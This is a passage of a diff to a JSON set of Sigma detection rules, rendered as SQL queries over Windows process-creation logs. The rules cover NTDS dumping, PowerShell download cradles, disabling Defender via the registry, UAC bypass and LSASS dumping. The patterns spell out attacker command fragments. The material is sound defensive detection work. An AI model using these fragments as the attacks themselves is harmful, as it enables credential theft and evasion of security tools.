It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1027.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" 
], - "filename": "proc_creation_win_susp_ntds.yml" + "filename": "proc_creation_win_pua_defendercheck.yml" }, { - "title": "Potential Emotet Rundll32 Execution", - "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "title": "Monitoring For Persistence Via BITS", + "id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", "status": "test", - "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "author": "FPT.EagleEye", + "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1197" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/SetNotifyCmdLine%' ESCAPE '\\' AND (CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\')) OR (CommandLine LIKE 
'%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/Addfile%' ESCAPE '\\' AND (CommandLine LIKE '%http:%' ESCAPE '\\' OR CommandLine LIKE '%https:%' ESCAPE '\\' OR CommandLine LIKE '%ftp:%' ESCAPE '\\' OR CommandLine LIKE '%ftps:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" + "filename": "proc_creation_win_bitsadmin_potential_persistence.yml" }, { - "title": "Lazarus Group Activity", - "id": "24c4d154-05a4-4b99-b57d-9b977472443a", + "title": "HackTool - SILENTTRINITY Stager Execution", + "id": "03552375-cc2c-4883-bbe4-7958d5a980be", "status": "test", - "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "Detects SILENTTRINITY stager use via PE metadata", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ "Unlikely" ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE 
'\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_apt_lazarus_group_activity.yml" - }, - { - "title": "Reg Disable Security Service", - "id": "5e95028c-5229-4214-afae-d653d573d0ec", - "status": "experimental", - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Unknown", - "Other security solution installers" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableRoutinelyTakingAction%' 
ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_disable_sec_services.yml" + "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" }, { - "title": "WmiPrvSE Spawned PowerShell", - "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "status": "stable", - "description": "Detects Powershell as a child of the WmiPrvSE process. 
Which could be a signe of remote access via WMI", - "author": "Markus Neis @Karneades", + "title": "VMToolsd Suspicious Child Process", + "id": "5687f942-867b-4578-ade7-1e341c46e99a", + "status": "experimental", + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "author": "behops, Bhabesh Raj", "tags": [ "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.persistence", + "attack.t1059" ], "falsepositives": [ - "AppvClient", - "CCM" + "Legitimate use by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll'))) AND NOT ((CommandLine = 'null') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_wmiprvse_spawns_powershell.yml" + "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" }, { - "title": "Suspicious Process Parents", - "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "title": "UAC Bypass via ICMLuaUtil", + "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", "status": "experimental", - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (NewProcessName = '')))))" - ], - "filename": "proc_creation_win_susp_parents.yml" - }, - { - "title": "New User Created Via Net.EXE", - "id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", - "status": "test", - "description": "Identifies the creation of local users via the net.exe command.", - "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", 
+ "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate user creation.", - "Better use event IDs for user creation rather than command line rules." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" ], - "filename": "proc_creation_win_net_user_add.yml" + "filename": "proc_creation_win_uac_bypass_icmluautil.yml" }, { - "title": "Use of W32tm as Timer", - "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "title": "Nslookup PowerShell Download Cradle - ProcessCreation", + "id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", "status": "experimental", - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "author": "frack113", + "description": "Detects suspicious powershell download cradle using nslookup. 
This cradle uses nslookup to extract payloads from DNS records", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1124" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nslookup.exe%' ESCAPE '\\' OR OriginalFileName LIKE '\\\\nslookup.exe' ESCAPE '\\') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -q=txt %' ESCAPE '\\' OR CommandLine LIKE '% -querytype=txt %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_w32tm.yml" + "filename": "proc_creation_win_nslookup_poweshell_download.yml" }, { - "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", - "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "title": "Suspicious PowerShell Download and Execute Pattern", + "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", "status": "experimental", - "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. 
spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", - "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Software installers that pull packages from remote systems and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND 
(CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" + "filename": "proc_creation_win_powershell_susp_download_patterns.yml" }, { - "title": "Capture Credentials with Rpcping.exe", - "id": "93671f99-04eb-4ab4-a161-70d446a84003", + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", "status": "test", - "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", - "author": "Julia Fomina, oscd.community", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059.003", + "attack.defense_evasion", + "attack.t1218.011", + "attack.s0412", + "attack.g0001" ], "falsepositives": [ "Unlikely" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rpcping.exe' ESCAPE '\\' AND (CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/s%' ESCAPE '\\')) AND ((CommandLine LIKE '%-u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%/u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%-t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\') OR (CommandLine LIKE '%/t%' ESCAPE '\\' AND 
CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_rpcping_credential_capture.yml" - }, - { - "title": "MMC Spawning Windows Shell", - "id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", - "status": "test", - "description": "Detects a Windows command line executable started from MMC", - "author": "Karneades, Swisscom CSIRT", - "tags": [ - "attack.lateral_movement", - "attack.t1021.003" - ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\BITSADMIN%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_susp_child_process.yml" + "filename": "proc_creation_win_apt_zxshell.yml" }, { - "title": "Suspicious DumpMinitool Usage", - "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "title": "Process Access via TrolleyExpress Exclusion", + "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", "status": "experimental", - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", "author": "Florian Roth 
(Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", + "attack.t1218.011", + "attack.credential_access", "attack.t1003.001" ], "falsepositives": [ 
@@ -26290,4889 +26367,4783 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR OriginalFileName = 'DumpMinitool.exe') AND ((NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR (CommandLine LIKE '% Full%' ESCAPE '\\' AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" ], - "filename": "proc_creation_win_dumpminitool_susp_execution.yml" + "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" }, { - "title": "Suspicious Certreq Command to Download", - "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", + "id": "8cde342c-ba48-4b74-b615-172c330f2e93", "status": "experimental", - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + 
"attack.defense_evasion", + "attack.t1003.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" + "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" }, { - "title": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE", - "id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", + "title": "Potential DLL Sideloading Using Coregen.exe", + "id": "0fa66f66-e3f6-4a9c-93f8-4f2610b00171", "status": "experimental", - "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE", - "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002" - ], - "falsepositives": [ - "Inventory tool runs", - "Administrative activity" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR 
OriginalFileName IN ('net.exe', 'net1.exe')) AND ((((CommandLine LIKE '% group %' ESCAPE '\\' OR CommandLine LIKE '% localgroup %' ESCAPE '\\') AND (CommandLine LIKE '%domain admins%' ESCAPE '\\' OR CommandLine LIKE '% administrator%' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\' OR CommandLine LIKE '%enterprise admins%' ESCAPE '\\' OR CommandLine LIKE '%Exchange Trusted Subsystem%' ESCAPE '\\' OR CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\' OR CommandLine LIKE '% /do%' ESCAPE '\\')) AND NOT (CommandLine LIKE '% /add%' ESCAPE '\\')) OR (CommandLine LIKE '% accounts %' ESCAPE '\\' AND CommandLine LIKE '% /do%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_net_groups_and_accounts_recon.yml" - }, - { - "title": "Imports Registry 